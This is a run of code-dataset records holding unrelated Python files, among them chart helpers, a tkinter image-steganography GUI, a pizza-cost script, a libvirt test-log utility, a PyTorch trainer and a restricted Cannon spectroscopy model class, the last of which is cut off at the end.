@staticmethod\n def plot_candlestick_chart(data, currency, counter_value, width=800, height=380, show_plot=False):\n # --> Create figure\n fig = go.Figure(data=[go.Candlestick(x=data['time_close'],\n open=data['price_open'], close=data['price_close'],\n high=data['price_high'], low=data['price_low'], )])\n\n fig.update_layout(\n title=currency + \"-\" + counter_value, title_x=0.5,\n yaxis_title=counter_value,\n autosize=False,\n width=width,\n height=height)\n\n if show_plot:\n fig.show()\n\n # --> Remove range slider before converting to image\n fig.update_layout(xaxis_rangeslider_visible=False)\n\n fig.write_image(\"Data/~temp/\" + currency + \"-\" + counter_value + \"_candlechart.png\")\n\n return\n\n @staticmethod\n def plot_pie_chart(data, values=\"cost\", show_plot=False):\n fig = px.pie(data, values=values, names=\"pair\")\n fig.update_traces(textposition='inside', textinfo='percent+label')\n\n fig.update_layout(title=values.title() + \" allocation\", title_x=0.5,\n showlegend=False)\n\n if show_plot:\n fig.show()\n\n fig.write_image(\"Data/~temp/\" + values + \"_piechart.png\")\n\n return\n\n @staticmethod\n def plot_dataframe(data, name, col_width=2.0, row_height=0.625, font_size=14,\n header_color='#40466e', row_colors=['#f1f1f2', 'w'], edge_color='w',\n bbox=[0, 0, 1, 1], header_columns=0,\n ax=None, show_plot=False):\n if ax is None:\n size = (np.array(data.shape[::-1]) + np.array([0, 1])) * np.array([col_width, row_height])\n fig, ax = plt.subplots(figsize=size)\n ax.axis('off')\n\n mpl_table = ax.table(cellText=data.values, bbox=bbox, colLabels=data.columns)\n\n mpl_table.auto_set_font_size(False)\n mpl_table.set_fontsize(font_size)\n\n for k, cell in six.iteritems(mpl_table._cells):\n cell.set_edgecolor(edge_color)\n if k[0] == 0 or k[1] < header_columns:\n cell.set_text_props(weight='bold', color='w')\n cell.set_facecolor(header_color)\n else:\n cell.set_facecolor(row_colors[k[0] % len(row_colors)])\n\n if show_plot:\n plt.show()\n\n ax.get_figure().savefig(\"Data/~temp/\" + name + \"_table.png\")\n\n return\n","repo_name":"vguillet/Portfolio_manager","sub_path":"src/Tools/Plot_tools.py","file_name":"Plot_tools.py","file_ext":"py","file_size_in_byte":3856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23269022304","text":"from modules import *\nimport steganography\n\n\nclass Stego:\n\n def OpenEncodeDialog(self):\n self.encode_dialog = tkinter.Toplevel(self.root)\n self.encode_dialog.resizable(True, False)\n self.encode_dialog.title('Image Steganographer - Encode')\n self.encode_dialog.configure(bg='#393E46')\n self.encode_dialog.geometry('400x400')\n self.encode_dialog.minsize(400, 400)\n\n self.img_path_label = tkinter.Label(self.encode_dialog, text='Image Path', font=(\n 'Inter', 12, 'bold'), fg='#F7F7F7', bg='#393E46').place(relx=0.5, rely=0.15, anchor=tkinter.CENTER)\n\n self.img_path_entry = tkinter.Entry(\n self.encode_dialog, width=30, bg='#F7F7F7')\n self.img_path_entry.place(\n relx=0.5, rely=0.21, anchor=tkinter.CENTER)\n\n self.message_label = tkinter.Label(self.encode_dialog, text='Secret Message', font=(\n 'Inter', 12, 'bold'), fg='#F7F7F7', bg='#393E46').place(relx=0.5, rely=0.30, anchor=tkinter.CENTER)\n\n self.message_entry = tkinter.Entry(\n self.encode_dialog, width=30, bg='#F7F7F7')\n self.message_entry.place(\n relx=0.5, rely=0.36, anchor=tkinter.CENTER)\n\n self.out_path_label = tkinter.Label(self.encode_dialog, text='Encoded File Name (Path)', font=(\n 'Inter', 12, 'bold'), fg='#F7F7F7', 
bg='#393E46').place(relx=0.5, rely=0.46, anchor=tkinter.CENTER)\n\n self.out_path_entry = tkinter.Entry(\n self.encode_dialog, width=30, bg='#F7F7F7')\n self.out_path_entry.place(\n relx=0.5, rely=0.52, anchor=tkinter.CENTER)\n\n self.encode_button = tkinter.Button(self.encode_dialog, text='ENCODE', bg='#EEEEEE', height=1, width=10, font=('Inter', 13, 'bold'), bd=0, command=lambda: steganography.Encode(self.img_path_entry.get(), self.message_entry.get(), self.out_path_entry.get(),self)).place(\n relx=0.5, rely=0.63, anchor=tkinter.CENTER)\n\n self.abort_button = tkinter.Button(self.encode_dialog, text='Abort', bg='#EEEEEE', width=10, font=('Inter', 10), bd=0, command=self.encode_dialog.destroy).place(\n relx=0.5, rely=0.9, anchor=tkinter.CENTER)\n\n def OpenDecodeDialog(self):\n\n self.decode_dialog = tkinter.Toplevel(self.root)\n self.decode_dialog.resizable(True, False)\n self.decode_dialog.title('Image Steganographer - Decode')\n self.decode_dialog.configure(bg='#393E46')\n self.decode_dialog.geometry('400x400')\n self.decode_dialog.minsize(400, 400)\n\n self.img_path_label = tkinter.Label(self.decode_dialog, text='Encoded Image Path', font=(\n 'Inter', 12, 'bold'), fg='#F7F7F7', bg='#393E46').place(relx=0.5, rely=0.17, anchor=tkinter.CENTER)\n\n self.img_path_entry = tkinter.Entry(\n self.decode_dialog, width=30, bg='#F7F7F7')\n self.img_path_entry.place(\n relx=0.5, rely=0.23, anchor=tkinter.CENTER)\n\n self.message_label = tkinter.Label(self.decode_dialog, text='Decoded Message', font=(\n 'Inter', 12, 'bold'), fg='#F7F7F7', bg='#393E46').place(relx=0.5, rely=0.56, anchor=tkinter.CENTER)\n\n self.text_ = tkinter.Text(self.decode_dialog, height=5, width=30)\n\n self.text_.place(relx=0.5, rely=0.70, anchor=tkinter.CENTER)\n\n self.text_.config(state='normal')\n\n self.decode_button = tkinter.Button(self.decode_dialog, text='DECODE', bg='#EEEEEE', height=1, width=10, font=('Inter', 13, 'bold'), bd=0, command=lambda: steganography.Decode(self.img_path_entry.get(), self)).place(\n relx=0.5, rely=0.32, anchor=tkinter.CENTER)\n\n self.text_.delete(1.0, \"end\")\n self.text_.insert(\"end\", self.decoded_message)\n\n self.abort_button = tkinter.Button(self.decode_dialog, text='Abort', bg='#EEEEEE', width=10, font=('Inter', 10), bd=0, command=self.decode_dialog.destroy).place(\n relx=0.5, rely=0.9, anchor=tkinter.CENTER)\n\n def OpenSuccessDialog(self):\n self.success_dialog = tkinter.Toplevel(self.encode_dialog)\n self.success_dialog.resizable(True, False)\n self.success_dialog.title('Image Steganographer - Success')\n self.success_dialog.configure(bg='#44AC33')\n self.success_dialog.geometry('500x100')\n self.success_dialog.minsize(500, 100)\n self.success_label = tkinter.Label(self.success_dialog, text='SUCCESS: Image Encoded Successfully!', font=(\n 'Inter', 15, 'bold'), fg='#F7F7F7', bg='#44AC33').place(relx=0.5, rely=0.33, anchor=tkinter.CENTER)\n self.ok_button = tkinter.Button(self.success_dialog, text='Ok', bg='#EEEEEE', width=10, font=('Inter', 10), bd=0, command=self.success_dialog.destroy).place(\n relx=0.5, rely=0.7, anchor=tkinter.CENTER)\n\n def NoHiddenMessageDialog(self):\n self.nhm_dialog = tkinter.Toplevel(self.decode_dialog)\n self.nhm_dialog.resizable(True, False)\n self.nhm_dialog.title('Image Steganographer - ERROR#1')\n self.nhm_dialog.configure(bg='#D0342C')\n self.nhm_dialog.geometry('600x100')\n self.nhm_dialog.minsize(600, 100)\n self.nhm_label = tkinter.Label(self.nhm_dialog, text='ERROR: No Hidden Message Found', font=(\n 'Inter', 15, 'bold'), fg='#F7F7F7', 
bg='#D0342C').place(relx=0.5, rely=0.33, anchor=tkinter.CENTER)\n self.abort_button = tkinter.Button(self.nhm_dialog, text='Abort', bg='#EEEEEE', width=10, font=('Inter', 10), bd=0, command=self.nhm_dialog.destroy).place(\n relx=0.5, rely=0.7, anchor=tkinter.CENTER)\n\n def GreaterSizeRequired(self):\n self.gs_dialog = tkinter.Toplevel(self.encode_dialog)\n self.gs_dialog.resizable(True, False)\n self.gs_dialog.title('Image Steganographer - ERROR#1')\n self.gs_dialog.configure(bg='#D0342C')\n self.gs_dialog.geometry('500x100')\n self.gs_dialog.minsize(500, 100)\n self.succes_label = tkinter.Label(self.gs_dialog, text='ERROR: Greater size image required', font=(\n 'Inter', 15, 'bold'), fg='#F7F7F7', bg='#D0342C').place(relx=0.5, rely=0.33, anchor=tkinter.CENTER)\n self.abort_button = tkinter.Button(self.gs_dialog, text='Abort', bg='#EEEEEE', width=10, font=('Inter', 10), bd=0, command=self.gs_dialog.destroy).place(\n relx=0.5, rely=0.7, anchor=tkinter.CENTER)\n\n def __init__(self):\n self.decoded_message = ''\n\n self.root = tkinter.Tk()\n\n self.root.resizable(True, False)\n self.root.title('Image Steganographer')\n self.root.configure(bg='#393E46')\n self.root.geometry('500x500')\n self.root.minsize(500, 500)\n\n self.heading_label_1 = tkinter.Label(self.root, text='WELCOME TO', font=(\n 'Inter', 15), fg='#F7F7F7', bg='#393E46').place(relx=0.5, rely=0.33, anchor=tkinter.CENTER)\n\n self.heading_label_2 = tkinter.Label(self.root, text='IMAGE STEGANOGRAPHER', font=(\n 'Inter', 20, 'bold'), fg='#F7F7F7', bg='#393E46').place(relx=0.5, rely=0.4, anchor=tkinter.CENTER)\n\n self.encode_button = tkinter.Button(self.root, text='ENCODE', bg='#EEEEEE', height=1, width=10, font=('Inter', 13, 'bold'), bd=0, command=self.OpenEncodeDialog).place(\n relx=0.5, rely=0.5, anchor=tkinter.CENTER)\n\n self.decode_button = tkinter.Button(self.root, text='DECODE', bg='#EEEEEE', height=1, width=10, font=('Inter', 13, 'bold'), bd=0, command=self.OpenDecodeDialog).place(\n relx=0.5, rely=0.58, anchor=tkinter.CENTER)\n\n self.quit_button = tkinter.Button(self.root, text='Quit', bg='#EEEEEE', width=10, font=('Inter', 10), bd=0, command=self.root.destroy).place(\n relx=0.5, rely=0.8, anchor=tkinter.CENTER)\n\n self.prj_info = tkinter.Label(self.root, text='Minor Project - 2022 - Image Steganography - 141', font=(\n 'Inter', 8), fg='#F7F7F7', bg='#393E46').place(relx=0.5, rely=0.9, anchor=tkinter.CENTER)\n\n self.root.mainloop()\n\n\nstg = Stego()\n","repo_name":"mehta-manan/Image_Steganography","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11220192190","text":"# Kyle Wenzel\n# October 9th, 2020\n# Pizza Program\n# This program will ask for the amount of pizzas, size and other conditions and calculate the final cost\n\nprint(\"\\nWelcome to the Pizza program. \")\n\nprint(\"Please select an option. 
\\n\")\nprint(''' 6 inch ($4).......Press 1\n10 inch ($7.50)....Press 2\n14 inch (12.90)....Press 3\n16 inch ($14.25)...Press 4''')\nselection1 = int(input(\"\\nEnter your selection: \"))\n\nif selection1 != 1 and selection1 != 2 and selection1 != 3 and selection1 != 4:\n print(\"\\nNot a valid selection.\")\n exit()\n\nif selection1 == 1:\n size = 6\n sizecost = 4\n cpt = \"$0.50\"\n cptm = 0.5\nelif selection1 == 2:\n size = 10\n sizecost = 7.5\n cpt = \"$0.60\"\n cptm = 0.6\nelif selection1 == 3:\n size = 14\n sizecost = 12.9\n cpt = \"$0.75\"\n cptm = 0.75\nelif selection1 == 4:\n size = 16\n sizecost = 14.25\n cpt = \"$0.90\"\n cptm = 0.9\n\nprint(\"\\nThe cost per topping for a\", size, \"inch pizza is\", cpt)\nselection2 = int(input(\"Enter the amount of toppings you would like: \"))\n\nif selection1 == 1 or selection1 == 2:\n extracheese = 1\nelif selection1 == 3 or selection1 == 4:\n extracheese = 2\n\nprint(\"\\nThe cost for extra cheese for a\", size, \"inch pizza is \" + \"${:.2f}\".format(extracheese))\nselection3 = input(\"Would you like extra cheese? (y)es or (n)o: \")\nselection3 = selection3.lower()\n\nif selection3 == \"y\" or selection3 == \"yes\":\n cheeseselection = 1\nelif selection3 == \"n\" or selection3 == \"no\":\n cheeseselection = 2\nelse:\n print(\"\\nYou broke something. \")\n exit()\n\nif cheeseselection == 2:\n extracheese = 0\n endcap = \"is: \"\nelif cheeseselection == 1 and extracheese == 1:\n extracheese = 1\n endcap = \"and extra cheese is: \"\nelif cheeseselection == 1 and extracheese == 2:\n extracheese = 2\n endcap = \"and extra cheese is: \"\nelse:\n print(\"\\nHow did you get here? \")\n exit()\n\npizzasub = sizecost + (cptm * selection2) + extracheese \npizzatax = pizzasub * 0.06\npizzafinal = pizzasub + pizzatax\n\nprint(\"\\nThe final cost for your\", size, \"inch pizza with\", endcap + \"${:.2f}\".format(pizzafinal))\nprint(\"Thank You!\")","repo_name":"The4thGoose/Programming","sub_path":"Chapter 3/Chapter 3 Programs/WenzelPizzaProgram.py","file_name":"WenzelPizzaProgram.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3855701084","text":"# Filename: virtlab.py\n# Summary: Writing test logs and case generator for virtlab.\n# Description: This module is for test logs and case generation use.\n# Maintainer: nzhang@redhat.com, xhu@redhat.com\n# Updated: Thu Apr 1, 2010\n# Version: 0.1.0\n\nimport os\nimport re\n\nfrom . import utils\nfrom . 
import process\n\nguest = {}\nguest['rhel3u9'] = 'RHEL-3.9'\nguest['rhel4u8'] = 'RHEL-4.8'\nguest['rhel5u4'] = 'RHEL-Server-5.4'\nguest['rhel5u5'] = 'RHEL-Server-5.5'\nguest['rhel6'] = 'RHEL-6.0'\nguest['fedora12'] = 'Fedora-12'\nguest['winxp'] = 'WinXP'\nguest['win2003'] = 'Win2003'\nguest['win2008'] = 'Win2008'\nguest['win2008r2'] = 'Win2008R2'\nguest['win7'] = 'Win7'\n\nmemory = {}\nmemory['1048576'] = '1G'\nmemory['2097152'] = '2G'\nmemory['4194304'] = '4G'\nmemory['8388608'] = '8G'\nmemory['1G'] = '1048576'\nmemory['2G'] = '2097152'\nmemory['4G'] = '4194304'\nmemory['8G'] = '8388608'\n\ntest_run_params = {}\n\n\ndef result_log(mod_case_func, case_params, ret, case_start_time, case_end_time):\n # get test run parameters\n global test_run_params\n libvirt_ver = utils.get_libvirt_version()\n hypervisor_ver = utils.get_hypervisor_version()\n kernel_ver = utils.get_host_kernel_version()\n\n testcase = mod_case_func\n if ret == 0:\n status = 'GOOD'\n else:\n status = 'FAIL'\n\n line = '-' * 120 + \"\\nSTART\\t[%s][][libvirt_version=%s][hypervisor_version=%s][kernel_version=%s]\" % (testcase, libvirt_ver, hypervisor_ver, kernel_ver)\n for key in list(case_params.keys()):\n if key != \"xml\":\n line += \"[%s=%s]\" % (key, case_params[key])\n line += \"\\t%s\\n%s\\nEND\\t%s\" % (case_start_time, status, case_end_time)\n logfile = 'result/result.log'\n if os.path.isfile(logfile):\n try:\n fp = open(logfile, 'a+')\n line = '\\n' + line\n fp.writelines(line)\n fp.close()\n except OSError as err:\n print(\"ERROR: error writing to file '\" + logfile + \"'!\")\n return False\n else:\n try:\n if os.path.exists('result'):\n pass\n else:\n os.makedirs('result')\n fp = open(logfile, 'w+')\n line = '\\n' + line\n fp.writelines(line)\n fp.close()\n except OSError as err:\n print(\"ERROR: error writing to file '\" + logfile + \"'!\")\n return False\n return True\n\n\ndef case_spawn(filename, str1, str2):\n fp_read = open(filename, 'r')\n filer = fp_read.read()\n sub = re.sub(str1, str2, filer)\n fp_read.close()\n fp_write = open(filename, 'w')\n fp_write.write(sub)\n fp_write.close()\n\n\ndef isvirtlab():\n cmd = \"ps aux | grep STAFProc |grep -v grep\"\n result = process.run(cmd, shell=True, ignore_status=True)\n if result.exit_status == 0:\n return True\n else:\n return False\n\n\ndef create_virtlab_log(testrunid):\n create_virtlab_cmd = 'cp -Rf log/%s result' % testrunid\n os.system(create_virtlab_cmd)\n","repo_name":"libvirt/libvirt-test-API","sub_path":"libvirttestapi/utils/virtlab.py","file_name":"virtlab.py","file_ext":"py","file_size_in_byte":2949,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"18"} +{"seq_id":"24878209720","text":"# Voros Vivien\r\n# J4VDGE\r\n# h986160\r\n\r\ndef dict_kiegeszit(parameter):\r\n lista = []\r\n if len(parameter) == 0:\r\n return parameter\r\n for i in parameter:\r\n lista.append(i)\r\n for i in range(1, max(lista)):\r\n if i not in lista:\r\n parameter[i] = 0\r\n\r\n return parameter\r\n\r\n\r\nclass Film:\r\n def __init__(self, _cim, hossz=60):\r\n self._cim = _cim\r\n self.hossz = hossz\r\n self.ertekelesek = []\r\n\r\n @property\r\n def cim(self):\r\n return self._cim\r\n\r\n @cim.setter\r\n def cim(self, ertek):\r\n if isinstance(ertek, str):\r\n self._cim = ertek\r\n\r\n def ertekelest_felvesz(self, ertekeles):\r\n if not isinstance(ertekeles, float):\r\n raise Exception(\"Hibas ertekeles\")\r\n else:\r\n if (ertekeles >= 1.0 and ertekeles <= 10.0):\r\n self.ertekelesek.append(ertekeles)\r\n else:\r\n raise 
Exception(\"Hibas ertekeles\")\r\n\r\n def __lt__(self, other):\r\n if not isinstance(other, Film):\r\n return False\r\n if self.hossz < other.hossz:\r\n return True\r\n else:\r\n return False\r\n\r\n def __str__(self):\r\n return self._cim + \", \" + str(self.hossz) + \" perc hosszu film, \" + str(\r\n len(self.ertekelesek)) + \" darab ertekelessel.\"\r\n\r\n def __eq__(self, other):\r\n if not isinstance(other, Film):\r\n return False\r\n return self.__dict__ == other.__dict__\r\n\r\ndef factorial(n):\r\n if n == 0:\r\n return 1\r\n else:\r\n return n * factorial(n-1)\r\n# res = { 4: 8, 6: 1, 3: 10 }\r\n# print(dict_kiegeszit(res))\r\n\r\nszoveg = \"Micimackó szereti a mézet.\"\r\nprint(szoveg[:])\r\n\r\n# 3x3 matrix\r\nX = [[12,7,3],\r\n [4 ,5,6],\r\n [7 ,8,9]]\r\n\r\n# 3x4 matrix\r\nY = [[5,8,1,2],\r\n [6,7,3,0],\r\n [4,5,9,1]]\r\n\r\n# result is 3x4\r\nresult = [[0,0,0,0],\r\n [0,0,0,0],\r\n [0,0,0,0]]\r\n\r\nfor i in range(len(X)):\r\n\r\n for j in range(len(Y[0])):\r\n for k in range(len(Y)):\r\n result[i][j] += X[i][k] * Y[k][j]\r\n\r\nfor r in result:\r\n print(r)\r\n\r\n\r\n","repo_name":"wivien19/python","sub_path":"film.py","file_name":"film.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"35360833234","text":"import torch\n\n\nclass Train():\n def __init__(self, model, config):\n self._model = model\n self._config = config\n self._optimizer = torch.optim.SGD(self._model.parameters(), lr=config['lr'],\n weight_decay=config['l2_regularization'])\n self._loss_func = torch.nn.MSELoss()\n\n def _train_single_batch(self, x, labels):\n \"\"\"\n 对单个小批量数据进行训练\n \"\"\"\n self._optimizer.zero_grad()\n y_predict = self._model(x)\n print(y_predict)\n loss = self._loss_func(y_predict.view(-1, 1), labels)\n\n loss.backward()\n self._optimizer.step()\n\n loss = loss.item() # The item() method extracts the loss’s value as a Python float.\n return loss, y_predict\n\n def _train_an_epoch(self, train_loader, epoch_id):\n \"\"\"\n 训练一个Epoch,即将训练集中的所有样本全部都过一遍\n \"\"\"\n self._model.train()\n total = 0\n X = train_loader[:,:-1]\n Labels = train_loader[:,-1]\n length = len(X)\n print(X.shape, Labels.shape)\n for index in range((len(X) // self._config[\"bitch_size\"]) + 1):\n end = min(self._config[\"bitch_size\"], length - self._config[\"bitch_size\"] * index)\n x, labels = X[self._config[\"bitch_size\"] * index : self._config[\"bitch_size\"] * index + end], Labels[self._config[\"bitch_size\"] * index : self._config[\"bitch_size\"] * index + end]\n x = torch.FloatTensor(x)\n labels = torch.FloatTensor(labels)\n if self._config[\"use_cuda\"] is True:\n x, labels = x.cuda(), labels.cuda()\n loss, y_predict = self._train_single_batch(x, labels)\n total += loss\n print(\"Training Epoch: %d, total loss: %f\" % (epoch_id, total))\n\n def train(self, train_dataset):\n self.use_cuda()\n for epoch in range(self._config[\"epoch\"]):\n print('-' * 20 + ' Epoch {} starts '.format(epoch) + '-' * 20)\n self._train_an_epoch(train_dataset, epoch_id=epoch + 1)\n\n def evaluate(self, test_dataset):\n x = test_dataset[:, :-1]\n labels = test_dataset[:, -1]\n\n x, labels = torch.FloatTensor(x), torch.FloatTensor(labels)\n if self._config[\"use_cuda\"] is True:\n x = x.cuda()\n y_predict = self._model(x)\n\n def use_cuda(self):\n if self._config['use_cuda'] is True:\n assert torch.cuda.is_available(), 'CUDA is not available'\n torch.cuda.set_device(self._config['device_id'])\n self._model.cuda()\n\n def 
\n    def save(self):\n        pass\n","repo_name":"shishanya/fm","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":2645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"17208694229","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\n\nfrom blog_own.models import Homework, Appointment, Meeting\nfrom blog_own.forms import Homework_form, Appointment_form, Meeting_form\n\n# Create your views here.\n\ndef inicio_blog(request):\n    return render(request, 'blog_own/start.html')\n\ndef homework_add(request):\n    if request.method == 'POST':\n        form = Homework_form(request.POST) # All the submitted form data arrives from the HTML.\n        print(form)\n        if form.is_valid(): # Django validates it\n            information = form.cleaned_data\n            homework = Homework( title=information['title'], subject=information['subject'], final_date=information['final_date'])\n            homework.save()\n        return render(request, \"blog_own/start.html\")\n\n    else:\n        form = Homework_form() # Empty form used to build the HTML.\n    \n    return render(request, \"blog_own/homework.html\", {\"form\": form})\n\ndef appointment_add(request):\n    if request.method == 'POST':\n        form = Appointment_form(request.POST) # All the submitted form data arrives from the HTML.\n        print(form)\n        if form.is_valid(): # Django validates it\n            information = form.cleaned_data\n            appointment = Appointment(title=information['title'], place=information['place'], date=information['date'])\n            appointment.save()\n        return render(request, \"blog_own/start.html\")\n\n    else:\n        form = Appointment_form() # Empty form used to build the HTML.\n    \n    return render(request, \"blog_own/appointment.html\", {\"form\": form})\n\ndef meeting_add(request):\n    if request.method == 'POST':\n        form = Meeting_form(request.POST) # All the submitted form data arrives from the HTML.\n        print(form)\n        if form.is_valid(): # Django validates it\n            information = form.cleaned_data\n            meeting = Meeting(title=information['title'], date=information['date'], link=information['link'], platform=information['platform'])\n            meeting.save()\n        return render(request, \"blog_own/start.html\")\n\n    else:\n        form = Meeting_form() # Empty form used to build the HTML.\n    \n    return render(request, \"blog_own/meeting.html\", {\"form\": form})\n\ndef search_homework(request):\n    return render(request, \"blog_own/search_homework.html\")\n\ndef search_appointment(request):\n    return render(request, \"blog_own/search_appointment.html\")\n\ndef search_meeting(request):\n    return render(request, \"blog_own/search_meeting.html\")\n\ndef search_date_homework(request):\n    if request.GET[\"date\"]:\n        date = request.GET[\"date\"]\n        objects = Homework.objects.filter(final_date__icontains=date) # Watch out for the field name here\n\n        return render(request, \"blog_own/search_results_homework.html\", {\"objects\": objects, \"date\":date})\n    \n    else:\n        answer = \"No se enviaron datos\"\n    \n    return HttpResponse(answer)\n\ndef search_date_appointment(request):\n    if request.GET[\"date\"]:\n        date = request.GET[\"date\"]\n        objects = Appointment.objects.filter(date__icontains=date)\n\n        return render(request, \"blog_own/search_results_appointment.html\", {\"objects\": objects, \"date\":date})\n    \n    else:\n        answer = \"No se enviaron datos\"\n    \n    return HttpResponse(answer)\n
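\n# Editor's addition -- a hypothetical sketch, not part of this app: the *_form\n# classes imported above are assumed to be plain Django forms along these lines,\n# inferred only from the cleaned_data keys the views read:\n#\n#     from django import forms\n#\n#     class Homework_form(forms.Form):\n#         title = forms.CharField()\n#         subject = forms.CharField()\n#         final_date = forms.DateField()\n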
answer = \"No se enviaron datos\"\n \n return HttpResponse(answer)","repo_name":"JuanPabloGomezCristancho/Entrega-intermedia-del-proyecto-final---Coderhouse","sub_path":"blog_own/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4165072606","text":"import os\nos.system('cls') # on windows\nstring=input()\ncount=0\nfor i in range(0,len(string)):\n if string[i].isupper():\n count+=1\nif count> (len(string)-count):\n string=string.upper()\nelse:\n string=string.lower()\nprint(string)","repo_name":"Mohammad-P/Python","sub_path":"Maktab_beginner_Python/SE01/Upperletter.py","file_name":"Upperletter.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"33232128459","text":"# -*- coding: utf-8 -*-\n\nALL_LABELS = 'bed bird cat dog down eight five four go happy house left marvin nine no off on one right seven sheila six stop three tree two up wow yes zero silence unknown'.split()\nTASK_LABELS = 'yes no up down left right on off stop go silence unknown'.split()\n\nL = 16000\nLABELS = TASK_LABELS\nid2name = {i: name for i, name in enumerate(LABELS)}\nname2id = {name: i for i, name in id2name.items()}\n\nms_to_s = 1000.0\nframe_size = int((20 / ms_to_s) * L) # 320\nstride_size = int((6.25 / ms_to_s) * L) # 100\nstrides = int(L / stride_size) # 160\n","repo_name":"senior-sigan/kaggle_speech_recognition","sub_path":"src/consts.py","file_name":"consts.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"38687973086","text":"#!/usr/bin/env python3 \n\nfrom pwanalyzer import PwAnalyzer\n\nrodinia = PwAnalyzer( \n name = 'srad',\n src = ['srad.cpp'], \n compiler = 'g++',\n header = [],\n cflags = [], \n ldflags = [''], \n run_cmd = './srad 2048 2048 0 127 0 127 2 0.5 2')\n\n#rodinia.debug() \nrodinia.build() \nrodinia.run()\nrodinia.wait(3.0)\nrodinia.profile() \nrodinia.pwreport() \nrodinia.pwloops() \n","repo_name":"vitduck/PWAnalyzer","sub_path":"srad/ref_seq/pwa_srad.py","file_name":"pwa_srad.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70406586281","text":"class Setting():\n\n def __init__(self):\n \"\"\"这里存储了设置\"\"\"\n # 屏幕设置\n self.screen_width = 1000\n self.screen_height = 800\n self.bg = (195, 195, 195)\n self.little_ship_speed = 2.3\n # 子弹设置\n self.bullet_width = 15\n self.bullet_height = 5\n self.bullet_speed_factor = 1.8\n self.bullet_color = 102, 102, 102\n # 方块速度\n self.rect_speed = 1\n self.rect_direction = 1\n","repo_name":"RyanLin1995/python","sub_path":"PythonLearning/小游戏/little_ship/little_ship_setting.py","file_name":"little_ship_setting.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"5755389945","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nA restricted Cannon model where bounds are placed on theta coefficients in order\nto make the model more physically realistic and limit information propagated\nthrough abundance correlations.\n\"\"\"\n\nfrom __future__ import (division, print_function, absolute_import,\n unicode_literals)\n\n__all__ = [\"RestrictedCannonModel\"]\n\nimport logging\nfrom .model import 
CannonModel\n\nlogger = logging.getLogger(__name__)\n\n\nclass RestrictedCannonModel(CannonModel):\n \"\"\"\n A model for The Cannon which includes L1 regularization, pixel censoring,\n and is capable of placing bounds on theta coefficients in order to make the\n model more physically realistic and limit information propagated through\n abundance correlations.\n\n :param training_set_labels:\n A set of objects with labels known to high fidelity. This can be \n given as a numpy structured array, or an astropy table.\n\n :param training_set_flux:\n An array of normalised fluxes for stars in the labelled set, given \n as shape `(num_stars, num_pixels)`. The `num_stars` should match the\n number of rows in `training_set_labels`.\n\n :param training_set_ivar:\n An array of inverse variances on the normalized fluxes for stars in \n the training set. The shape of the `training_set_ivar` array should\n match that of `training_set_flux`.\n\n :param vectorizer:\n A vectorizer to take input labels and produce a design matrix. This\n should be a sub-class of `vectorizer.BaseVectorizer`.\n\n :param dispersion: [optional]\n The dispersion values corresponding to the given pixels. If provided, \n this should have a size of `num_pixels`.\n \n :param regularization: [optional]\n The strength of the L1 regularization. This should either be `None`,\n a float-type value for single regularization strength for all pixels,\n or a float-like array of length `num_pixels`.\n\n :param censors: [optional]\n A dictionary containing label names as keys and boolean censoring\n masks as values.\n\n :param theta_bounds: [optional]\n A dictionary containing label names as keys and two-length tuples as\n values, indicating acceptable minimum and maximum values. Specify\n `None` to indicate no limit on a boundary.\n \"\"\"\n\n def __init__(self, training_set_labels, training_set_flux, training_set_ivar,\n vectorizer, dispersion=None, regularization=None, censors=None, \n theta_bounds=None, **kwargs):\n\n super(RestrictedCannonModel, self).__init__(training_set_labels,\n training_set_flux, training_set_ivar, vectorizer, \n dispersion=dispersion, regularization=regularization, \n censors=censors, **kwargs)\n\n self.theta_bounds = theta_bounds\n return None\n\n\n @property\n def theta_bounds(self):\n \"\"\" Return the boundaries placed on theta coefficients. \"\"\"\n return self._theta_bounds\n\n\n @theta_bounds.setter\n def theta_bounds(self, theta_bounds):\n \"\"\"\n Set lower and upper boundaries on specific theta coefficients.\n\n :param theta_bounds:\n A dictionary containing vectorizer terms as keys and two-length \n tuples as values, indicating acceptable minimum and maximum values. \n Specify `None` to indicate no limit on a boundary. 
For example:\n            `theta_bounds={\"FE_H\": (None, 0), \"TEFF^3\": (None, None)}`\n        \"\"\"\n        theta_bounds = {} if theta_bounds is None else theta_bounds\n        if isinstance(theta_bounds, dict):\n            \n            label_vector = self.vectorizer.human_readable_label_vector\n            terms = label_vector.split(\" + \")\n            checked_bounds = {}\n            for term in theta_bounds.keys():\n                bounds = theta_bounds[term]\n                term = str(term)\n                \n                if term not in terms:\n                    logger.warning(\"Boundary on term '{}' ignored because it is \"\n                                   \"not in the label vector: {}\".format(\n                                       term, label_vector))\n                else:\n                    if len(bounds) != 2:\n                        raise ValueError(\"bounds must be a two-length tuple\")\n                    if None not in bounds and bounds[1] < bounds[0]:\n                        raise ValueError(\"bounds must be in (min, max) order\")\n\n                    checked_bounds[term] = bounds\n\n            self._theta_bounds = checked_bounds\n\n        